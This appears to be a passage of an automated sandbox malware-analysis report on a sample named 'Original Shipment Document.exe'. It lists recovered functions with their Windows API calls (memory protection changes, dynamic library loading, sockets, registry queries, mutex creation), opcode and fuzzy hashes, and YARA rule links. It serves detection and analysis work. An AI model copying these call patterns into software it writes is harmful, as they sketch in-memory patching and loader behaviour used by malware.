Part of subcall function 0045189E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00451929

LoadLibraryExW.KERNEL32(?,?,?), ref: 004523F2
StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00452402

Part of subcall function 004520F0: CloseHandle.KERNEL32 ref: 004520FA

Strings

\system.ni.dll, xrefs: 004523F8

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
String ID: \system.ni.dll
API String ID: 2189784845-482435895
Opcode ID: e55f5ef731e0506f724ed042a4343189e4c387aa826c48c21dcc95ad899fc70a
Instruction ID: 10f00ae05dcbf55b60b85c0e7a54018d7a64209ba14570848d2551964d35c361
Opcode Fuzzy Hash: e55f5ef731e0506f724ed042a4343189e4c387aa826c48c21dcc95ad899fc70a
Instruction Fuzzy Hash: 3CF05E31900318BBCF11AFB4DC09E9B3BA8AF04746F004076BE15D6163EA35DA649BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0045189E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 004518AB
EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004518C5
GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004518FD
GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00451929

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
String ID:
API String ID: 3431743260-0
Opcode ID: a84572bfa794674f2c6949c22059d4171ef75112f600e9807d59b78a7f5ecaf0
Instruction ID: c7bf3b38340847139db773df7b3535ee39fc3c9841a50d65da160eac9b1eb8cc
Opcode Fuzzy Hash: a84572bfa794674f2c6949c22059d4171ef75112f600e9807d59b78a7f5ecaf0
Instruction Fuzzy Hash: 7821D275A4020AABDF10DFA4C891BEFB7B9FF04346F104166E942E21B2E7749E49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0045146C, Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00451493
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 004514BA
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 004514C0
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004514C7

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 4115577372-0
Opcode ID: 6f6faf6a5c365529b9dcd6b9c3c9905440372f6152ad5c3ca4c01c5182de3b92
Instruction ID: 4ef52bc8c19f942e3eeaf86414445bbc36a76c0fc74515b46fd0b4a7d270e158
Opcode Fuzzy Hash: 6f6faf6a5c365529b9dcd6b9c3c9905440372f6152ad5c3ca4c01c5182de3b92
Instruction Fuzzy Hash: 00F0ADB6500349FBCF109FA4CC48B9B7E6CEB04392F008225BA09611A2D734DB44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00451E5D, Relevance: 4.6, APIs: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00451E71
LoadLibraryA.KERNEL32 ref: 00451E7F
GetProcAddress.KERNEL32(?,?), ref: 00451EAF

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 05ffc95c8e8af6a3ffdb19dc2d4b7bcd7936d14fc8ab62115c74c8040d4ef2d0
Instruction ID: a72c84e1ea2bba1c8219d6f20a3dd690545a59a1f7337d0242e950f59b6022a8
Opcode Fuzzy Hash: 05ffc95c8e8af6a3ffdb19dc2d4b7bcd7936d14fc8ab62115c74c8040d4ef2d0
Instruction Fuzzy Hash: 46113C71A00216ABDB21CF55CC85AABB7F8BF0479A711006AED01E7366E734EE49CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0044CBD8, Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,0044B1FB), ref: 0044CBDB
__malloc_crt.LIBCMT ref: 0044CC09
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044CC16

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 0e26a21b5991d51e5fe901c4b14c68a7b5d6b29846ff2e219140b9b5a3ffe545
Instruction ID: 006f1ee338688643374222dce427a267c8a82caa156b3be80683dc2f3ab0c2ad
Opcode Fuzzy Hash: 0e26a21b5991d51e5fe901c4b14c68a7b5d6b29846ff2e219140b9b5a3ffe545
Instruction Fuzzy Hash: F5F027379062605FFAA17E353CC8477166CDEC636A31A482BF457C3341FA188D8382A9

Uniqueness

Uniqueness Score: -1.00%

Function 0045234A, Relevance: 4.5, APIs: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00452366
LoadLibraryA.KERNEL32(?), ref: 00452373
GetProcAddress.KERNEL32(00000000,?), ref: 00452381

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 59b4a6a7d78abad47cfd8d97bbd83f56d0dcdededfc346cea550a969b5cb800e
Instruction ID: 33caa33fd362b801db9fefc36b3f6dc4586187721d0d710474ffe29105db55c5
Opcode Fuzzy Hash: 59b4a6a7d78abad47cfd8d97bbd83f56d0dcdededfc346cea550a969b5cb800e
Instruction Fuzzy Hash: 1CF08132400228FBCB226F30DD4449F7B65AB42F537184937FC0592167D7BCCA588AC8

Uniqueness

Uniqueness Score: -1.00%

Function 004519E9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00451A13

Part of subcall function 0045189E: GetCurrentProcess.KERNEL32 ref: 004518AB
Part of subcall function 0045189E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004518C5
Part of subcall function 0045189E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004518FD
Part of subcall function 0045189E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00451929

Strings

C:\Users\user\Desktop\Original Shipment Document.exe, xrefs: 00451A2A

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: C:\Users\user\Desktop\Original Shipment Document.exe
API String ID: 1620000358-2057233173
Opcode ID: 6daae9d2711ff949e5bf11e548b575e542c5b6a51b8ac9f3b56a3ac44c4d89df
Instruction ID: e42df0aa900dbe944e96d3393a15af3f7e41fe9b7d5156cd3584ff592e06666b
Opcode Fuzzy Hash: 6daae9d2711ff949e5bf11e548b575e542c5b6a51b8ac9f3b56a3ac44c4d89df
Instruction Fuzzy Hash: 53018F3551020AAACF12EF68C849AAB33B8EB04305F408566FC56C7222EA78DA59CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0045195F, Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,?), ref: 00451981
VirtualProtect.KERNEL32(?,?,?,?), ref: 004519DE

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0eaae168d4d9c8758c3f3f47a602cd4f88cc0af1605e7a4dd32cd7c29d72ffda
Instruction ID: d618f9b006037aa851756b7b4f2313171c69bdc81f4fd397cfb5fc29964f94ee
Opcode Fuzzy Hash: 0eaae168d4d9c8758c3f3f47a602cd4f88cc0af1605e7a4dd32cd7c29d72ffda
Instruction Fuzzy Hash: 4A11A7B2500204EFDB208F54C880BBAB7F8EF45B56F044166ED45D7292E334EE44DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 053706E2, Relevance: 1.6, APIs: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 053707B9

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 50747953c619e8e445ee18c6cef914971f840a6bd79fc864a528319183ae742a
Instruction ID: 23b3255eb75ba3d3f4ff123701e5cc80f360b011ffa0fbbb2033e18417bdce4d
Opcode Fuzzy Hash: 50747953c619e8e445ee18c6cef914971f840a6bd79fc864a528319183ae742a
Instruction Fuzzy Hash: 2541A37150D3C45FE7138B259C59A62BFB4EF07220F0984DBE984CF1A3D269A809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05371BF1, Relevance: 1.6, APIs: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05371CBA

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 27f2e54fe3d30bc0377a8f25d7803b117db0c8609609e7e456bf103cbb9ca375
Instruction ID: 4a25b4a2eb337a4bee5e95cf23622b35409eb1170217aaf909fcf1c24eaa93e0
Opcode Fuzzy Hash: 27f2e54fe3d30bc0377a8f25d7803b117db0c8609609e7e456bf103cbb9ca375
Instruction Fuzzy Hash: 84415F7140D7C09FE7238B659C54B66BFB4EF07210F1984DBE9C58F1A3D269A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05372AC3, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E94), ref: 05372B97

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 95bf92b1d6d7f652a82f7829729ac1d9478edd9a98738a55aca2b6a8b0eef1ec
Instruction ID: fae30a767fd732c05b5bad9490d70b93853da9cf5a9581de676dc036b439c6e7
Opcode Fuzzy Hash: 95bf92b1d6d7f652a82f7829729ac1d9478edd9a98738a55aca2b6a8b0eef1ec
Instruction Fuzzy Hash: DE31D4B1504384AFEB218B65CC85FA6BFBCEF05310F14489AFA849B182D375A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05372E73, Relevance: 1.6, APIs: 1, Instructions: 93encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E94,?,?), ref: 05372F36

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 4d0c0cbf8cef4ab7ddfdafeeda96b477499962204bf91a12367e337ef29cd1d0
Instruction ID: b02532be346227cf0400d665f97c5e79de118a41e3877f718989b5f22f818e8b
Opcode Fuzzy Hash: 4d0c0cbf8cef4ab7ddfdafeeda96b477499962204bf91a12367e337ef29cd1d0
Instruction Fuzzy Hash: BF31907250D3C45FD7038B258C61A62BFB4EF47614F0D84DBD8848F1A3E624A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05372D75, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372E29

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 2feea67cb86a0051e01110f69e8674eea3c5e37c11ab6b6cb485ec5d542600b2
Instruction ID: 466acfff84128887f314ec8744c276452b3778b43efb4ef580ddac26db743eb2
Opcode Fuzzy Hash: 2feea67cb86a0051e01110f69e8674eea3c5e37c11ab6b6cb485ec5d542600b2
Instruction Fuzzy Hash: F0317275509784AFEB22CF65CC84F53BFB8EF06710F08849AF9858B162D374A909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0537162B, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053716E0

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 29d71bf8d845fb01646f24c944265194b9ee7609b070c6055fc76a86190aac69
Instruction ID: 37de2d6520edcf2002f4e63d32da668c1f1ea2e91dabdf1f6306af6b83bad8ab
Opcode Fuzzy Hash: 29d71bf8d845fb01646f24c944265194b9ee7609b070c6055fc76a86190aac69
Instruction Fuzzy Hash: 073193B25083849FE722CF54CC84F96BFB8EF46310F08849AE9859B153D764A509C771

Uniqueness

Uniqueness Score: -1.00%

Function 023AB6CD, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 023AB788

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 07e231cd062e0994b3ecdcbdb93fb687b14a344aa3745019b58a6c3b59499e6f
Instruction ID: 11cef7cf0f0608644f78631ad25fd90ab079cb1a8064a75d33376480924c8c4c
Opcode Fuzzy Hash: 07e231cd062e0994b3ecdcbdb93fb687b14a344aa3745019b58a6c3b59499e6f
Instruction Fuzzy Hash: 7731B1715083846FE722CF25CC85FA2BFB8EF06314F0884AAE985CB253D365E449CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0537283C, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053728D9

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: e7ea0cf766c405ffba1721ba94a9b181ff9d42bdb8e900c99e86fd906cfa46d6
Instruction ID: 772401b94cb15daa266a4c7484044668620b98a04aadbcff33470d76fdc0e044
Opcode Fuzzy Hash: e7ea0cf766c405ffba1721ba94a9b181ff9d42bdb8e900c99e86fd906cfa46d6
Instruction Fuzzy Hash: 0431F5B64093806FEB228F64DC45FA7BFB8EF06310F0884AAF9858B153D324A505C771

Uniqueness

Uniqueness Score: -1.00%

Function 05371F32, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05371FDC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ef7efac4867c6300a51f0c1c5115956cc028ed2cdea4c6b4881d2c8b2d4929cd
Instruction ID: ed32e4b7bf0c11c07e108105476576e170dd0409913f7e176defec2d6d30c8f2
Opcode Fuzzy Hash: ef7efac4867c6300a51f0c1c5115956cc028ed2cdea4c6b4881d2c8b2d4929cd
Instruction Fuzzy Hash: EF3181B65093846FE7228B65CC40F93BFB8EF06310F0885DAE9859B153D364A949DB71

Uniqueness

Uniqueness Score: -1.00%

Function 053722C8, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 0537237A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: a67cdb0c4734504d0f82164e831b75086320417d93c33b3ddd6a8534f4cdfb24
Instruction ID: 55bb3947b369a1266da9d306183e0054bd886fc138c018492d95c7cb28a15ce5
Opcode Fuzzy Hash: a67cdb0c4734504d0f82164e831b75086320417d93c33b3ddd6a8534f4cdfb24
Instruction Fuzzy Hash: 2F31B1B2404784AFE722CB55DC85F56FFF8FF06320F08859AE9849B252D374A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 023AB5D9, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 023AB685

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b4db778d2f6a689caaddb52d936ea88c4029c3b8044e3bf5d65555b98a620796
Instruction ID: 77729166e42005cc7d3ebf67bcda87ac26cf4038d7eef6d2478c347642e56749
Opcode Fuzzy Hash: b4db778d2f6a689caaddb52d936ea88c4029c3b8044e3bf5d65555b98a620796
Instruction Fuzzy Hash: 19218FB2404244AFEB218B55CC84FA7FFFCEF05310F08899AFA849B152D725A509C761

Uniqueness

Uniqueness Score: -1.00%

Function 023AA078, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E94,?,?), ref: 023AA10E

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 9890c538b3e02a56af5139604cf1da5b057beef56610961e1ed782bbc91f2956
Instruction ID: 76fb22945db577690cacc79df5c0b38286a8be2de35020d4d790c4cd9b1ae356
Opcode Fuzzy Hash: 9890c538b3e02a56af5139604cf1da5b057beef56610961e1ed782bbc91f2956
Instruction Fuzzy Hash: A431937640D3C05FC3038B259C55A65BFB4EF47620F0E85DBD884CF1A3E228A819C762

Uniqueness

Uniqueness Score: -1.00%

Function 0537257D, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 0537261D

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 509793730a54ded23bbd5a937bc6f1b57889a715ca4b28e7754683a3fc166fb3
Instruction ID: e4634eeaca4050f9d44ad87b78068dafcbfcb2fdd33fabf4e229dac04125e623
Opcode Fuzzy Hash: 509793730a54ded23bbd5a937bc6f1b57889a715ca4b28e7754683a3fc166fb3
Instruction Fuzzy Hash: 583184B5509384AFE722CF25DC45F56FFF8EF05210F0884AAE9859B292D364E904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 053731D2, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 0537326A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 8c09ff5add430d9274f178e6412b67e806ee95ef28ea0251bea26d62459f6cbb
Instruction ID: 65fa49b3d5ece6d0bfb030c23280513e54b308f5d91bc74e37c6ad4261807e68
Opcode Fuzzy Hash: 8c09ff5add430d9274f178e6412b67e806ee95ef28ea0251bea26d62459f6cbb
Instruction Fuzzy Hash: 6F21B6B25093846FEB228B65DC50FA6BFB8EF06310F0884DAE9C4DF153D664A509D771

Uniqueness

Uniqueness Score: -1.00%

Function 05372AF2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E94), ref: 05372B97

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: d89caf93506982cc82b04c626942d3df13f382cdfc17757bfb460436a3226ed9
Instruction ID: 367a33b8a4992abb4a17603703981efb83e41bc35dc35e9d4b03da255b2addc9
Opcode Fuzzy Hash: d89caf93506982cc82b04c626942d3df13f382cdfc17757bfb460436a3226ed9
Instruction Fuzzy Hash: 2721B5B1500204AFFB31DF55DC85FA6FBACEF44710F14885AFE499A181D7B4A5058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 05371542, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 053715D6

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8b8bd23162120371508609d0e1c1f9bee38a901ae770915e470f1d288ff438c1
Instruction ID: 795c21cf1f070d549b07b552780fb72d0f50471065e0ea9e384960fad9258623
Opcode Fuzzy Hash: 8b8bd23162120371508609d0e1c1f9bee38a901ae770915e470f1d288ff438c1
Instruction Fuzzy Hash: 5F21A0B2504344AFEB218F64DC44F66FFB8EF05210F08889AED849B152D264A508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 053732C9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 0537335A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 740ce58f61465bd4daafa7488ab72f0103fb4d0a8526d6019d1315d095b875a2
Instruction ID: 3d9014fe00c46558b12ba3336d27986d49c715d2001a78d1982b3fb6ba827ab8
Opcode Fuzzy Hash: 740ce58f61465bd4daafa7488ab72f0103fb4d0a8526d6019d1315d095b875a2
Instruction Fuzzy Hash: AF21A6B15093846FE7228F65DC44F66BFB8EF45210F0888AAF945DB152D764E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05371987, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,?,?), ref: 05371A2A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 72ddfcfaa58eec7f02e85f262f7a75fe5ec3b2211b5155f59f03dbe3c683da97
Instruction ID: 0ffce5764d586194c378b9dfffe4c85b98e9589e560b2284735d9a8b82f6c525
Opcode Fuzzy Hash: 72ddfcfaa58eec7f02e85f262f7a75fe5ec3b2211b5155f59f03dbe3c683da97
Instruction Fuzzy Hash: 3421C7755093C06FD3138B25CC51B62BFB4EF47A10F0981CBED848B593D625A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 053721E6, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05372271

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: a964119e4869e2229af9f51f23c84c752b2a66edf8ff52dc143b76dbb6a5ec90
Instruction ID: b9f9fe8d96bac23b08d0575bd1b7d7bd638f03d263813eb82006b2da63002db4
Opcode Fuzzy Hash: a964119e4869e2229af9f51f23c84c752b2a66edf8ff52dc143b76dbb6a5ec90
Instruction Fuzzy Hash: 6921A3B1505380AFE722CF65DC45F66FFE8EF05210F0884AAF9849B252D375E909C765

Uniqueness

Uniqueness Score: -1.00%

Function 05370810, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053708A5

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7772df0f2a60215853d0f3472c6bdff552a1d1ae2f3b76a0d1525a8e9068e027
Instruction ID: 7907a4f1a7d62b985e6d9ffc2ad0c1318b9a97b7911792b855909782070e3942
Opcode Fuzzy Hash: 7772df0f2a60215853d0f3472c6bdff552a1d1ae2f3b76a0d1525a8e9068e027
Instruction Fuzzy Hash: E0212BB68087846FE7138B25DC40FA2BFB8EF46720F0880DAE9849B153D224A905C771

Uniqueness

Uniqueness Score: -1.00%

Function 05371470, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E94,?,?), ref: 05371516

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: b3af3c38cfda1e96e234d26306aacdbdc240fdd6e2e73c5906ed0b7afa8e85f3
Instruction ID: c216ebba3345b449e3098bd0668484dc6eb1f66ebd7cd2d9d48515da6792830e
Opcode Fuzzy Hash: b3af3c38cfda1e96e234d26306aacdbdc240fdd6e2e73c5906ed0b7afa8e85f3
Instruction Fuzzy Hash: 7221A37540E3C06FC3138B358C55A11BFB4EF87A10F1D80CFD8848B5A3D225A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0537408B, Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05374112

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 27921d255447668de30bde1a2d1262c5e2a60810e8f35f66e1cc1dd3f409f54c
Instruction ID: 05a040e6663fcad5482e50600cd671dc5a956b8ecd7f8fb7dfa04991c40548e3
Opcode Fuzzy Hash: 27921d255447668de30bde1a2d1262c5e2a60810e8f35f66e1cc1dd3f409f54c
Instruction Fuzzy Hash: 7B21A4B15083846FEB21CF65DC85FA6FFB8EF46310F0884AAE9849F252D375A449C761

Uniqueness

Uniqueness Score: -1.00%

Function 023AB420, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E94), ref: 023AB4BB

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58c24d59e54dc73eaa2838ca2a1004f2510b41174e0c2fd29bd44d57588f7df9
Instruction ID: 70879c51afce8f08c81956268b8f1050e1e9779edf01f317667d86985e62a081
Opcode Fuzzy Hash: 58c24d59e54dc73eaa2838ca2a1004f2510b41174e0c2fd29bd44d57588f7df9
Instruction Fuzzy Hash: 2321D7715093806FE7228B24CC85F96FFB8EF06724F1884DAFA845F192D264A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0537073A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 053707B9

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 299922db12b477d51d554fea5171678467219da6242f7bb3274a8674659ca461
Instruction ID: 7bfcd9080cc5a180595fd95d3e9463a2f2f3717cd3181652a05f2bbc216b1974
Opcode Fuzzy Hash: 299922db12b477d51d554fea5171678467219da6242f7bb3274a8674659ca461
Instruction Fuzzy Hash: 96219AB1900244AFEB21CF69CD88F66FBE8EF04320F0484A9E9899B642D775E404CE61

Uniqueness

Uniqueness Score: -1.00%

Function 053700A3, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05370126

Memory Dump Source

